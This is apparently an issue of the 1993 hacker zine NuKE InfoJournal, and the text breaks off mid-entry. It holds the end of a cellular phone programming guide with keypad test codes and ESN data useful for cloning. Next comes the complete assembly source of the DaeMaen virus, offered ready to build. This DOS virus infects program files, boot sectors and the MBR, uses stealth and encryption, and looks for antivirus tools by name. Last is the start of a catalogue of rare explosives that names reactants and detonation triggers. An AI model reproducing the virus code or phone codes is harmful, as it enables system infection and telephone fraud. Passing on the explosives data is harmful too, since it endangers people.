Press SELECT + 2 + SEND Both Handsets: Enter step number, then data for individual parameter Press STO to enter data for each step Increment by pressing next step number To review parameters press: RCL + Step number + STO (to exit) To select Alternate NAM, Press 1 + STO + 90 (NAM 1) or 2 + STO + 90 (NAM 2) Press SEND to write NAM information PASS will appear in display if data is valid Step # of Digits 0 System ID: 5 XXXXX + STO 1 Local Use: 1 (0 or 1) + STO 2 MIN Opt: 1 (0 or 1) + STO 3 Mobile Number: 10 XXX-XXX-XXXX + STO 4 Initial Page Channel: 3 (333 or 334) + STO 5 Access Overload: 2 XX + STO 6 Preferred System: 1 [0 (B) or 1 (A)] + STO 7 Group ID: 2 XX + STO 8 Lock code (1): 4 XXXX + STO 9 Options F5 DTMF Duration: 1 0 - Continuous 1 - 100 ms Press STO to program phone New Unlock Code: RCL + 70 + Current 4 digit Unlock code + new 4 digit Unlock code System Select: X + STO + 8 + 8 X=1 A only X=2 B Only X=3 Home X=4 Standard AB or BA X=5 Inverted BA or AB ------------------------------------------------------------------------------- UNIDEN CP-5500 Portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: UNIDEN Programmer: Keypad ESN Prefix DEC: 172 HEX: AC ESN, S/N Match Required: Yes Stamped Model Number: CP-5500 Number of Channels: 832 Programming Sequence: Install fully charged battery Power On Select NAM NAM 1: 1 + STO + 90 NAM 2: 2 + STO + 90 Power Off Press PWR key while holding * and # Continue holding * and # for four seconds "Roam.No Svc.In Use& M" lights will display Release * and # keys Enter sequence 32218591 (within 7 seconds) SID will display Enter Step number, then data for individual parameter Press STO to enter data for each step (ie to enter System ID, press 0+XXXXX+STO) Increment by pressing next step number To review parameters press: RCL + step number + STO (to exit) Press SEND to write NAM information PASS will appear in display if data is valid Press END to exit program mode Step # of Digits 0 System ID: 5 XXXXX + STO 1 Local Use: 1 (0 or 1) + STO 2 MIN Opt: 1 (0 or 1) + STO 3 Mobile Number: 10 XXX-XXX-XXXX + STO 4 Initial Page Channel: 3 [333 or 334] + STO 5 Access Overload: 2 XX + STO 6 Preferred System: 1 [9 (B) or 1 (A)] + STO Note 1: Step number will not display when entering mobile number) 7 Group ID: 2 XX + STO 8 Lock Code: 4 XXXX + STO 9 DTMF Duration: 1 0 - 100 ms or 1 - Continuous Press STO after entering Step 9 Press SEND to write data Press END to exit program mode New Program code: RCL + 70 + Current 4-digit Program Lock Code (Preset 0000) + new 4 digit program code + STO + END New Unlock Code: RCL + 70 + 4 digit program Lock Code (Preset 0000) + SEND + New 4 digit Unlock Code (Preset 0123) + STO + END System Select: X + STO + 8 + 8 X=1 A Only X=2 B Only X=3 Home X=4 Standard AB or BA X=5 Inverted BA or AB X=6 System ID (*) (*) To set System ID: CLR + 5 digit System ID + STO + 72 To view current System Select Setting: RCL + 88 ------------------------------------------------------------------------------- USA CORP Portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: MITSUBISHI Programmer: Keypad ESN Prefix DEC: 134 HEX: 86 ESN, S/N Match Required: No Handset Programmable: Yes Number of Channels: 666 Programming Sequence: Power On (END/FCN and 0 for one second) While holding CLR, enter 4472866 or 4476822 or 6926232 Enter data then press SEND to increment Press END/FCN to write NAM information # of Digits Mobile Number: 10 XXX-XXX-XXXX Unlock Code: 3 XXX System ID: 5 XXXXX Local Use: 1 1 MIN Opt: 1 1 Initial Page Channel: 3 333 or 334 Access Overload: 2 XX Preferred System: 1 0(B) or 1(A) Group ID: 2 XX End-to-End Signaling: 1 1 Booster Opt: 1 0 or 1 Autonomous Reg: 1 0 or 1 ------------------------------------------------------------------------------- WALKER 910 ------------------------------------------------------------------------------- NAM Type: Tri-State Manufacturer: WALKER Programmer: MOTOROLA 1801-CLENAM or Curtis ESN Prefix DEC: 152 HEX: 98 ESN, S/N Match Required: Yes Handset Programmable: No Number of Channels: 666 Phone Number: XXX-XXX-XXXX Lock Code: XXX MIN Opt: Enabled Repertory Opt: Enabled Handsfree: Disabled (Enabled if Equipped) Local Use: Enabled End-to-End Signaling: Enabled Horn Alert: Enabled System ID: XXXXX Preferred System: A or B Access Overload: XX Initial Paging Channel: 333 or 334 Station Class: 00 Hex Address B7 B0 13 1 0 0 0 0 0 0 1 Hex Address 13 - B0 Total Call Timer B2 Preferred Only B7 Individual Call Timer horn Alert: (ALT) New Unlock Code: NAM System Select: Switch on side or cradle (BA or AB) =============================================================================== ================================================================================ NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- E- "The DaeMaen Virus Source Code" Nu Nu KE KE -N -N Article By Virus By uK uK Rock Steady TaLoN E- E- Nu E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu NuKE InfoJournal #7 August 1993 Well, here it is, the DaeMaen virus...the binary has been out for quite a while now. Two versions of DaeMaen exist; the source code presented here is from the first version. The changes made in the second version were minor. You'll need to assemble this with the A86 assembler. It is *not* compatible with MASM or TASM due to some minor directive differences, but it can easily be modified to compiler under the more popular assemblers (we chose to present to you the original, untouched source code, straight from the author). It is an extremely nice piece of work, only 2k in size, quite tight for all that code (it does .COM, .EXE, .SYS, .BIN, .OVL, and boot sector infections). However it is somewhat lacking: some methods of infection are somewhat lacking, and I'm not too thrilled about the technique of infecting on file closes. Nevertheless, I find it extrordinary learning material. Rock Steady/NuKE [Note: TaLoN aka Terminator-Z is no longer with NuKE due to legal problems. After being investigated by Australian authorities for illegal activities totally unconnected to his role in NuKE, he decided to take the heat off himself by "turning in" members of NuKE for crimes that they never committed. It is sad to see such a fine programmer do something so dispicable and underhanded, and we at NuKE regret his decision. We wish him all the best in the courts... -NM] -------------------------------- CUT HERE ------------------------------------- ; DeMn Virus specifications: ; ; An extrodinary virus if we may say so. It is able to infect .COMs, .EXEs, ; .SYSs, .BINs, .OVLs, Floppy Boot Sectors, HD Master Boot Records. ; ; Infects files on executions, opens, ext opens, attribs, close & renames. ; Infected files will feature a simple Random key encryption routine. ; ; Stealth abilities range from, redirects read/write away from partition table ; "Dir", hides file size increase without CHKDSK fuckups ; Memory stealth, memory disappears from DOS's view without function calls ; ; -January 28, 1993 -TaLoN org 0 @tsrchk equ 0a7ceh ; fingerprint @mbr equ 9 ; sector of original MBR @com_exe equ 0 @sys equ 1 @JO equ 070h ; JO operand for variable branch @JMPS equ 0ebh ; JMP SHORT (as above) @RET equ 0c3h ; RET for encrypt shit p_len equ 3072/16 ; 3k in paragraphs v_start: syshead db 18 dup 90h ; header for SYS infection push ax push cx push si push ds push bp call encr_decr e_start: cld call $+3 pop si sub si, $-1 mov bp, es branch: jo sys_entry com_exe_entry: add sp, 10 ; fuck off other registers call chk jz get_lost jmp domem pre_gl: xor si, si get_lost: mov es, bp ; exit without fingerprints push cs pop ds add si, offset old_shit gl: jo exit_exe mov di, 0100h push bp push di movsw movsb jmp short zero_shit exit_exe: add bp, 10h lodsw add ax, bp xchg ax, bx lodsw mov ss, bx xchg ax, sp lodsw xchg ax, bx lodsw add ax, bp push ax push bx sub bp, 10h zero_shit: xor ax, ax ; clean our hands mov bx, ax mov cx, ax mov dx, ax mov si, ax mov di, ax mov ds, bp mov bp, ax retf ; I didn't see nothin' sys_entry: ;int 05 ; for debugger mov ax, word ptr [si+old_shit] mov word ptr [6], ax ; restore INTR address push ax push bx push dx push di push es push ax call chk pop ax jz go_sys_exit push ax mov cx, si push si lea ax, [si+4096] mov bx, 10h xor dx, dx div bx inc ax ; align on paragraph boundary mov bx, cs add ax, bx mov es, ax xor si, si xor di, di rep movsb ; move the driver up in memory push cs pop es xor di, di mov cx, v_len mov bx, offset sys_00 jmp move_us go_sys_exit: jmp short sys_exit sys_00: push ax mov ax, cs inc ah mov es, ax mov bp, ax pop ds xor si, si mov di, si pop cx rep movsb ; move SYS to final resting place push es pop ds push cs pop es xor si, si mov di, si mov cx, 9 rep movsw ; copy their header xor si, si push cs pop ds call dms ; do some hooking shit pop ax mov word ptr [strat_1], ax mov word ptr [strat_1+2], bp mov word ptr [intr_1+2], bp mov ax, word ptr [8] mov word ptr [intr_1], ax mov word ptr [6], offset strat ; hehe trick DOS mov word ptr [8], offset intr stc sys_exit: pop es pop di pop dx pop bx pop ax pop bp ; restore registers pop ds pop si pop cx pop ax jc sys_exit_2 push word ptr cs:[6] ret sys_exit_2: jmp strat db '[DeMn] by TLN-{NK}' new13: ; check for floppy access ; check for hd read sector 1 cmp ax, @tsrchk jne n13_2 xchg ax, bx push cs pop es iret n13_2: push ax shr ah, 1 cmp ah, 1 jne exit13 cmp dl, 80h jb do_floppy ja exit13 or dh, dh ; head 0? jnz exit13 cmp cx, 1 ; sector 1? ja exit13 pop ax cmp ax, 0309h ; writing a few sectors? jae e13 ; yeah.. let him call save push ax mov al, 1 ; give him the "real" MBR mov cx, @mbr call i13 pop ax dec al ; and read the rest of or al, al ; what he wants jz hd_done1 add bx, 200h call i13 sub bx, 200h hd_done1: call restore ; no sectors left clc inc ax xor ah, ah ; status=no error retf 2 gorestore: call restore exit13: pop ax e13: jmp bypass do_floppy: call save xor ax, ax mov ds, ax inc dl test byte ptr [43fh], dl ; drive still spinning? jnz gorestore ; yeah, don't reinfect dec dl call gooknuke call eat_floppy jmp short gorestore new13_2: ; the guts of multipartite infection ; check to see if i21 has changed... if so, hook it call save push cs pop es xor ax, ax mov ds, ax mov si, 21h*4 mov di, offset oldvect+8 cld cmpsw je nochange cmpsw je nochange call capture_21 push cs pop ds mov si, offset oldvect+0 ; copy over saved shit so that lea di, [si+4] ; our i13 doesn't call here movsw ; any more [i21 has been hooked] movsw nochange: call restore jmp dword ptr cs:[oldvect+0] db 'Hugs to Sara Gordon' ; get her agro new21: ; guts cmp ah, 11h ; FIND_FIRST je go_kstealth cmp ah, 12h ; FIND_NEXT je go_kstealth cmp ah, 3ch ; CREAT je create cmp ah, 3dh ; OPEN je letsgo cmp ah, 3eh ; CLOSE je close cmp ah, 43h ; ATTRIB je letsgo cmp ax, 4b00h ; EXEC je letsgo cmp ah, 56h ; RENAME je letsgo cmp ah, 6ch ; EXT_OPEN jne n21_2 push dx mov dx, si call infect pop dx jmp short n21_2 letsgo: call infect n21_2: jmp dword ptr cs:[oldvect+8] file_end: mov ax, 4202h jmp short seek_vals file_zero: mov ax, 4200h seek_vals: xor cx, cx xor dx, dx i21: pushf push cs call n21_2 ret go_kstealth: jmp short kstealth create: call i21 ; go create the file jc creat_exit ; successful? mov word ptr cs:[handle], ax ; save handle call save call save_name call restore creat_exit: retf 2 close_r dw offset creat_exit close: push word ptr cs:[close_r] call i21 jc close_exit cmp word ptr cs:[handle], bx ; the one we've got stored? jne close_exit call save jmp infect_2 ; external entry go_ce: call restore close_exit: ret ; exit with current flagz kstealth: ; stole some of this from Mutating Rocko, mine wouldn't ; quite work right! but I have changed it substantially.. call i21 or al,al ;Good FCB? jnz no_good ;nope push ax push bx push cx push ds push es mov ah,51h ;Is this Undocmented? huh... call i21 mov es,bx cmp bx,es:[16h] jnz not_infected ;Not for us man... mov bx,dx mov al,[bx] push ax mov ah,2fh ;Get file DTA call i21 pop ax inc al push es pop ds jnz fcb_okay add bx,7h fcb_okay: mov ax, [bx+19h] mov cl, 9 shr ax, cl cmp ax, 100 ; 100 years more than expected? jb not_infected mov cx, 1 cmp word ptr [bx+9], 'YS' ; is it a SYS file? jne subtract cmp byte ptr [bx+11], 'S' jne subtract inc cx ; take twice as much from SYS subtract: sub word ptr [bx+1dh], v_len sbb word ptr [bx+1fh], 0 loop subtract not_infected: pop es pop ds pop cx pop bx pop ax no_good: iret infect: call save call save_name infect_2: call gooknuke ; DS=ES=CS call namechk jc go_bitch mov byte ptr [infected], 0 ; reset date change flag mov byte ptr [branch], @JO mov ax, 3524h call i21 push es push bx mov dx, offset no_good ; use the IRET from stealth bit mov ax, 2524h call i21 ; disable Critical Error Handler push cs pop es mov dx, offset filename mov ax, 4300h call i21 ; get attribs push cx mov ax, 4301h xor cx, cx call i21 pop cx jc go_bitch1 push cx mov ax, 3d02h mov dx, offset filename call i21 ; open read/write jc bitch2 xchg ax, bx mov ax, 5700h call i21 push cx push dx xchg ax, dx mov cl, 9 shr ax, cl cmp ax, 100 ; 100 years more than expected? pop dx pop cx jae bitch3 push cx push dx mov dx, offset signature mov ah, 3fh mov cx, 24 call i21 ; load header xor ax, cx ; file too small? jnz bitch4 mov si, dx lodsb cmp al, 'M' je goexe ; it's an EXE cmp al, 'Z' je goexe cmp byte ptr [itype], @sys ; is it a SYS file? je gosys jmp short gocom go_bitch: jmp short bitch go_bitch1: jmp short bitch1 bitch4: pop dx pop cx cmp byte ptr [infected], 0 ; has the file been infected? je set4 add dh, 0c8h ; add 100 years to date set4: mov ax, 5701h call i21 bitch3: mov ah, 3eh call i21 ; close file bitch2: push cs pop ds pop cx mov ax, 4301h mov dx, offset filename call i21 ; reset attribs bitch1: pop dx pop ds mov ax, 2524h call i21 bitch: call restore ret goexe: call exeinf jmp short bitch4 gocom: call cominf jmp short bitch4 gosys: call sysinf jmp short bitch4 cominf: mov di, offset old_shit stosb movsw ; save first 3 bytes call file_end or dx, dx jnz com_done cmp ax, 0f000h ; COM too big? jae com_done add ax, 15 ; bypass SYS fill push ax mov byte ptr [gl], @JO call write_us mov di, offset signature mov al, 0e9h stosb pop ax stosw jmp write_head com_done: ret db 'Hey John! If this is bad, wait for [VCL20]!' exeinf: call file_end push ax ; check for internal overlays push dx mov ax, word ptr [page_cnt] mov cx, 512 mul cx pop cx pop bp cmp ax, bp jb com_done cmp dx, cx jb com_done mov di, offset old_shit mov si, offset relo_ss movsw movsw lodsw movsw movsw ; save the old shit call file_end mov byte ptr [gl], @JMPS mov cx, 10h ; # of paragraphs in whole file div cx sub ax, word ptr [hdr_size] ; except the header mov word ptr [relo_cs], ax add dx, 18 ; skip SYS fill mov word ptr [exe_ip], dx add dx, offset vstack+32 ; set up a stack mov word ptr [exe_sp], dx mov word ptr [relo_ss], ax call write_us mov cx, 512 ; calculate new # of code pages div cx or dx, dx ; any bits left over? jz fp2 inc ax ; yes, inc # pages to accommodate fp2: mov word ptr [part_page], dx mov word ptr [page_cnt], ax jmp write_head sysinf: dec si lodsw or ax, ax ; we'll only do files jz sys_ok ; starting with 0000 or FFFF inc ax ; (this excludes CONFIG.SYS) jz sys_ok ret sys_ok: mov si, offset signature+6 mov di, offset old_shit movsw ; save old INTR offset call file_end add ax, 18 ; skip SYS header shit mov word ptr [si-2], ax mov byte ptr [branch], @JMPS call write_us xor cx, cx mov dx, v_len ; file size increase = v_len*2 mov ax, 4201h call i21 mov ah, 40h call i21 ; write 0 bytes ; (extend file to pointer) write_head: call file_zero mov dx, offset signature mov cx, 24 mov ah, 40h call i21 ; write the header mov byte ptr [infected], 1 ret eat_hd: ; infect HD partition table ; assumes DS=ES=CS mov ax, 0201h mov bx, offset signature mov cx, 1 mov dx, 80h call i13 cmp word ptr [signature+2], @tsrchk je hd_done mov cx, @mbr ; sector 9 mov ah, 3 call i13 mov di, bx mov word ptr [drv+1], 80h mov word ptr [sec+1], @mbr ; original MBR mov si, offset kmart_kode mov cx, k_len rep movsb inc cx mov ah, 3 mov byte ptr [residence], 1 call i13 mov ax, 0304h xor bx, bx mov cx, 10 call i13 hd_done: ret eat_floppy: ; do boot sector mov ax, 0201h mov bx, offset boot_sect mov cx, 1 ; track 0 sector 1 xor dh, dh ; head 0 call i13 lea si, [bx+3] mov cx, 8 kloop1: lodsb cmp al, ' ' jb nope cmp al, 'z' ja nope loop kloop1 ; more complex than need be, to allow for old formats as well as new formats.. ; it will check to see if it will cross a track boundary; if so, then it won't ; infect the disk. call calcsect push cx sub word ptr [totsecs], 5 call calcsect pop ax sub ax, cx ; overrun track boundary? add al, 4 jnz nope push dx xor dl, dl mov word ptr [drv+1], dx ; drive 0.. on boot remember mov word ptr [sec+1], cx mov ax, 0301h mov bx, offset boot_sect pop dx call i13 ; write it jc nope mov word ptr [oem+6], @tsrchk ; fuck it up a bit ; so we don't reinfect it later inc cx mov ax, 0304h ; write virus code [4 sectors] xor bx, bx mov byte ptr [residence], 0 call i13 ; write ourselves mov di, offset boot_sect push di mov ax, 034ebh stosw add di, 34h mov si, offset kmart_kode mov cx, k_len rep movsb ; patch boot sector pop bx inc cx mov ax, 0301h xor dh, dh call i13 ; write patched boot sector nope: ret calcsect: push dx mov ax, word ptr [totsecs] ; calculate track, head, sector ; add ax, word ptr [hidnsecs] ; of last sector xor dx, dx div word ptr [trksecs] mov cx, dx xor dx, dx div word ptr [headcnt] pop bx mov bh, dl push bx push cx ; remainder sectors mov cl, 6 ; CH=track shl ah, cl pop cx add cl, ah ; bits 9 & 10 of track # mov ch, al ; sector pop dx ret save_name: push cs pop es mov di, offset filename push di mov si, dx storename: lodsb stosb or al, al jnz storename pop dx ; DS:DX = filename push cs pop ds ret namechk: mov si, offset filename nc1: lodsb or al, al jnz nc1 mov dx, si sub dx, 4 sub si, 12 cmp si, offset filename jae McAssFuck mov si, offset filename McAssFuck: dec si ; check for McWanker's cmp si, dx ; ] uppercase extchk: scasw je extchk_2 inc di loop extchk ncexit_err: stc ; nope ret extchk_2: lodsb and al, 0dfh scasb jne ncexit_err mov byte ptr [itype], @com_exe cmp di, offset residence jb ncexit mov byte ptr [itype], @sys ; OK, it's a SYS file ncexit: clc ret chkMcAsshole: and ax, 0dfdfh cmp ax, 'CS' ; SCAN? je chkma_end cmp ax, 'LC' ; CLEAN? je chkma_end cmp ax, 'SV' ; VSHIELD? je chkma_end cmp ax, '-F' ; F-PROT? chkma_end: ret db 'For Dudley' domem: mov bx, offset pre_gl push bx mov ax, bp dec ax memloop: mov ds, ax cmp byte ptr [0], 'Z' je fixmem mov bx, ax ; keep previous block add ax, word ptr [3] ; up to next MCB inc ax jmp short memloop fixmem: cmp word ptr [3], p_len*5 ; is block too small? jae fm_ok mov ds, bx ; yeah, use previous block xchg ax, bx fm_ok: sub word ptr [3], p_len add ax, word ptr [3] inc ax mov word ptr [12h], ax mov es, ax xor ax, ax mov ds, ax sub word ptr [413h], 3 ; TOM=TOM-3 (not necessary) push cs pop ds xor di, di mov cx, v_len cld rep movsb gohi: push es mov ax, offset dms ; dms = Do More Shit push ax retf dms: mov ax, 70h mov ds, ax mov si, 1 scan: dec si lodsw cmp ax, 1effh ; CS segment override qualifier? jne scan mov ax, 2cah ; RETF 2 opcode cmp [si+4], ax ; (double check) je right cmp [si+5],ax jne scan ; nope, try again right: lodsw ; get the actual storage address xchg ax, si push si mov di, offset oldvect+4 movsw ; save the original i21 vector movsw pop si mov word ptr [si], offset go_n13 mov word ptr [si+2], cs do13_2: push cs pop ds mov dx, 80h call eat_hd jnc go_ints ; hard drive infect fucked up? xor dx, dx ; yep, infect floppy instead call eat_floppy go_ints: call enable xor ax, ax mov ds, ax call capture_21 push cs pop ds ret db '[VCL20]' write_us: call file_end xor ax, ax int 1ah mov word ptr [key+1], dx mov di, offset eret mov cx, wheelchair_len mov si, offset wheelchair rep movsb ; move the temporary code mov byte ptr [go_n13], @JMPS ; bypass new13 call encr_decr call enable ; and re-enable it call file_end ret ; this wheelchair stuff is probably the most dodgey code in the whole virus... wheelchair: mov byte ptr [eret], @RET ; repair the code mov ah, 40h mov cx, v_len xor dx, dx pushf call dword ptr cs:[oldvect+8] ; write encrypted bitch mov ax, offset encr_decr call ax ; now decrypt ourselves! [hehe] ret wheelchair_len equ $-wheelchair ; length of temp code capture_13: mov di, offset oldvect+4 mov ax, offset go_n13 capture_13_2: mov si, 13h*4 xor dx, dx mov ds, dx call doint ret capture_21: mov si, 21h*4 mov di, offset oldvect+8 mov ax, offset new21 call doint ret doint: mov cx, 2 d2: xchg [si], ax stosw lodsw ; inc si by 2 mov ax, cs loop d2 ret i13: pushf ; simulate int 13h push cs call bypass ret enable: mov byte ptr [go_n13], @JO ; restore jump to new13 ret save: pop word ptr cs:[temp_jmp] ; preserve registers pushf push ax push bx push cx push dx push si push di push ds push es push bp jmp word ptr cs:[temp_jmp] restore: pop word ptr cs:[temp_jmp] ; and give them back pop bp pop es pop ds pop di pop si pop dx pop cx pop bx pop ax popf jmp word ptr cs:[temp_jmp] gooknuke: push cs pop ds push cs pop es ret kmart_kode: jmp short kkk3 dw @tsrchk ; infection marker kkk3: cli xor ax, ax mov ss, ax mov sp, 7c00h sti mov ds, ax sec: mov cx, 0 drv: mov dx, 0 push dx ffq: push cx call chk jz go69 mov si, 412h add word ptr [si+1], -3 ; take 3k lodsb lodsw mov cl, 6 shl ax, cl mov es, ax xor bx, bx mov ax, 0204h ; read us into high memory pop cx push cx inc cx int 13h go69: push es mov ax, offset disk_entry push ax retf chk: mov ax, @tsrchk int 13h xor bx, @tsrchk ret k_len equ $-kmart_kode disk_entry: call chk jz de_exit mov di, offset oldvect+0 mov ax, offset new13_2 call capture_13_2 call capture_13 ; make new13 jump to new13_2 mov si, 21h*4 movsw movsw call gooknuke cmp byte ptr [residence], 1 je de_exit mov dx, 80h call eat_hd de_exit: xor ax, ax mov es, ax pop cx pop dx mov bx, 7c00h push es push bx mov ax, 0201h int 13h retf old_shit: int 20h dw 0,0,0 exts db 'COMEXEBINOVLSYS' ; valid extensions residence db 0 ; 0=from floppy boot ; 1=from MBR e_end: ; end of encrypted data strat: push ax push ds lds ax, dword ptr cs:[strat_1] ; trick the host driver db 9ah strat_1 dd 0 mov ax, word ptr [6] mov word ptr cs:[strat_1], ax ; update pointer if changed jmp short sys_return ; (cater for other infections) intr: push ax push ds lds ax, dword ptr cs:[intr_1] db 9ah intr_1 dd 0 mov ax, word ptr [8] mov word ptr cs:[intr_1], ax sys_return: pop ds pop ax retf go_n13: jo bypass ; bypass new13 while encrypted jmp new13 bypass: jmp dword ptr cs:[oldvect+4] move_us: rep movsb ; this must be here in case it's ;int 05 jmp bx ; a very small SYS file, so the ; move doesn't hang the system encr_decr: push cs pop ds call $+3 faewq: pop si sub si, offset faewq - e_start mov cx, (e_len)-1 key: mov ax, 0 ; harmless so far dloop: xor word ptr [si], ax inc si inc al ; yeah wreck the key dec ah loop dloop eret: ret ; this code gets changed to ; write the virus to file v_end: ; wheelchair code goes here itype equ $+wheelchair_len infected equ itype + 2 temp_jmp equ infected + 1 oldvect equ temp_jmp + 2 ; +0 old i13 ; +4 multipartite handler ; +8 old i21 signature equ oldvect + 12 part_page equ signature + 2 ; part-page at EOF page_cnt equ part_page + 2 ; count of code pages hdr_size equ page_cnt + 4 ; size of header in paragraphs relo_ss equ hdr_size + 6 ; displacement of stack segment (SS) exe_sp equ relo_ss + 2 ; stack pointer (SP) chksum equ exe_sp + 2 ; exe_ip equ chksum + 2 ; instruction pointer (IP) relo_cs equ exe_ip + 2 ; displacement of code segment (CS) ; 24 bytes vstack equ relo_cs + 2 ; temp stack for EXE file handle equ relo_cs + 2 ; save for file handle on Create filename equ handle + 2 ; filename of target file boot_sect equ relo_cs + 100 ; as not to overwrite things by accident oem equ boot_sect + 3 sectsize equ oem + 8 clustsize equ sectsize + 2 ressecs equ clustsize + 1 fatcnt equ ressecs + 2 rootsiz equ fatcnt + 1 totsecs equ rootsiz + 2 media equ totsecs + 2 fatsize equ media + 1 trksecs equ fatsize + 2 headcnt equ trksecs + 2 hidnsecs equ headcnt + 2 v_len equ v_end - v_start e_len equ e_end - e_start ------------------------------- CUT HERE --------------------------------------- ================================================================================ ================================================================================ NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- E- "Uncommon And Rare Explosives" Nu Nu KE KE By -N -N uK uK Viper E- E- Nu E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu NuKE InfoJournal #7 August 1993 % Uncommon And Rare Explosives % Table Of Contents ~~~~~~~~~~~~~~~~~ Entry Number Chemical Name/Topic ~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ Introduction Technical Notes 1 Acetyl Nitrate 2 Ammonium Picrate 3 Benzoyl Peroxide 4 Chlorine Dioxide 5 Chlorine Heptoxide 6 Chlorine Monoxide 7 Cyanogen Azide 8 Diazoacetic Ester 9 Diazomethane 10 2,4-Dinitroresorcinol 11 Erythrityl Tertranitrate 12 Ethyl Ether 13 Fluorine Nitrate 14 Fluorine Perchlorate 15 Gold, Explosive 16 Hydroxylamine 17 Isopropyl Ether 18 Lead Azide 19 Mannitol Hexanitrate 20 Mercuric Oxycyanide 21 Methyl Nitrate 22 Nitramine, Tetralite, Tetryl. 23 Nitrogen Chloride 24 Nitrogen Selenide 25 Nitroguanidine 26 Pentaerythritol Tetranitrate, PETN 27 Pentrinitrol 28 Pentryl 29 Peracetic Acid 30 Performic Acid 31 Potassium Picrate 32 Propargyl Nitrate 33 n-Propyl Nitrate 34 Silver Perchlorate 35 Tetranitromethane 36 Tetrasilane 37 Tetrasulfur Tetranitride 38 sym-Trinitrobenzene 39 Trinitromethane 40 Uranyl Nitrate ----------------------------------------------------------------------------- Entry: % Introduction % This file contains the entries of uncommon or rare explosives. By this, it is meant that the following compounds have explosive properties, but are not used as commercial/military explosives and/or they are generally unknown to the public. They may not be used as commercial/military explosives for a number of reason, some of which may be: lack of stability, cost of materials, difficulty of synthesis, cost of synthesis, toxicity, etc. The general format of the compound entries will be as follows: Entry: Entry Number Name: Common Name IUPAC Name: IUPAC Designated Name Condensed Formula: Molecular Formula / Structural Condensed Formula Physical Properties: Some physical properties of the explosive Explosive Properties: The explosive properties of the compound Manufacture: The manufacturing procedure, and lab preparation procedure (if given) Use: The use Toxicity (if known): Toxicity, and side effects if known NOTE: Most of the following compounds are highly dangerous. Due to this fact, this article has been written for the knowledge of the explosives rather than the experience of making them. Thus, the manufacture of each explosive compound will not be given in a step by step "how to" fashion, but rather just the bare minimum reactant chemicals (if given). The author holds no responsibility for the way any individual, or group uses the following information. ----------------------------------------------------------------------------- Entry: % Technical Notes % Being interested in explosives as I am, and not seeing any new files on explosives (or new explosives themselves), I decided to write this file, based on a huge chemistry reference manual containing more than 10,000 chemical compounds. I hope many others will find it as useful as I have. The elimination process for chemicals occured as follows: (1) Any chemicals that are commonly known to the public were eliminated. Examples are 2,4,6-trinitrotoluene (TNT), 1,2,3-Propanetriol trinitrate (nitroglycerin), and cellulose hexanitrate (guncotton). (2) Any chemicals that were listed or described in any other file i have seen were eliminated. Examples are ammonium tri-iodide, acetone peroxide, and mercury fulminate. I gave the picric acid salts, and a few other explosives, an exception to this rule because I think they are important explosives. (3) The chemical has to be explosive by itself, not a redox or other type of reaction (e.g. dust/particle explosion, or gas/combustible explosion). This eliminated chemicals such as potassium permanganate. I gave the chemicals ethyl ether, and isopropyl ether an exception to this rule as they form an unknown explosive peroxide readily that conforms to all other rules. Any compounds that passed the three processes are included in this file. I regret any N/A's (not available) and will try to find the missing information in the future. ----------------------------------------------------------------------------- Entry: 1 Name: Acetyl Nitrate IUPAC Name: Acetic acid anhydride with nitric acid Condensed Formula: C2H3NO4 / CH3COONO2 Physical Properties: Fuming, colorless, hygroscopic liquid. bp 22 c. Explosive Properties: Should be stored in a solution of P2O5 to stabilize it. Always explodes when heated above 60 c or comes into contact with HgO. Explosions have also occured with ground glass surfaces. Manufacture: Preparation from acetic anhydride and N2O5. Use: In nitrations to introduce a single nitro group in an ortho position on an aromatic ring. Toxicity (if known): Irritant, corrosive. ----------------------------------------------------------------------------- Entry: 2 Name: Ammonium Picrate IUPAC Name: 2,4,6,-Trinitrophenol ammonium salt Condensed Formula: C6H6N4O7 Physical Properties: Bright yellow bitter scales or orthorhombic crystals. d 1.72. Slightly soluble in alcohol. Explosive Properties: Explodes easily from heat or shock. Manufacture: By subsitution of the ammonia group (NH4) on the hydrogen of the 1-hydroxyl group. Use: In explosives, fireworks, rocket propellants. Toxicity (if known): N/A ----------------------------------------------------------------------------- Entry: 3 Name: Benzoyl Peroxide IUPAC Name: Dibenzoyl Peroxide Condensed Formula: C14H10O4 / (C6H5CO)2O2 Physical Properties: Crystals. mp 103 -106 c. Sparingly soluble in water. Explosive Properties: May explode when heated. Manufacture: Prepared by the interaction of benzoyl chloride and a cooled solution of sodium peroxide. Use: Oxidizing agent in bleaching oils, flours, etc. Catalyst in the plastics industry; initiator in polymerization. Toxicity (if known): Non toxic in small amounts. ----------------------------------------------------------------------------- Entry: 4 Name: Chlorine Dioxide IUPAC Name: Chlorine Peroxide Condensed Formula: ClO2 Physical Properties: Strong oxidizing yellow to reddish yellow gas at room temp. Unplesant odor similar to that of chlorine and reminiscent of that of nitric acid. Unstable in light; stable in dark if pure. Reacts violently with organic materials. mp -59 c, bp 11 c. Explosive Properties: In concentrations in excess of 10% at atmospheric pressure it is easily detonated by sunlight, heat, contact with mercury or carbon monoxide. Manufacture: Prepared from chlorine and sodium chlorite; from potassium chlorate and sulfuric acid; by passing NO2 through a column of sodium chlorate. Use: Bleaching cellulose, paper-pulp, flour, leather, fats and oils, textiles, beeswax; purification of water; tast and odor control of water; cleaning and detanning leather; oxidizing agent; bactericide and antiseptic. Toxicity (if known): May be highly irritating to skin and mucous membranes of respiratory tract. May cause pumonary edema. ----------------------------------------------------------------------------- Entry: 5 Name: Chlorine Heptoxide IUPAC Name: Dichlorine heptoxide Condensed Formula: Cl2O7 Physical Properties: Colorless, very volitile oily liquid. mp -91.5 c, bp -82 c. Slowly hydrolyzed by water forming perchloric acid. Explosive Properties: Explodes violently upon concussion or on contact with a flame or iodine. Manufacture: Prepared by dehydration of perchloric acid with P2O5. Use: Catalyst in cellulose esterification. Toxicity (if known): May be irritating to skin, mucous membranes. ----------------------------------------------------------------------------- Entry: 6 Name: Chlorine Monoxide IUPAC Name: Dichlorine monoxide Condensed Formula: Cl2O Physical Properties: Yellowish-brown gas. Disagreeable, penetrating odor. mp -120.6 c, bp 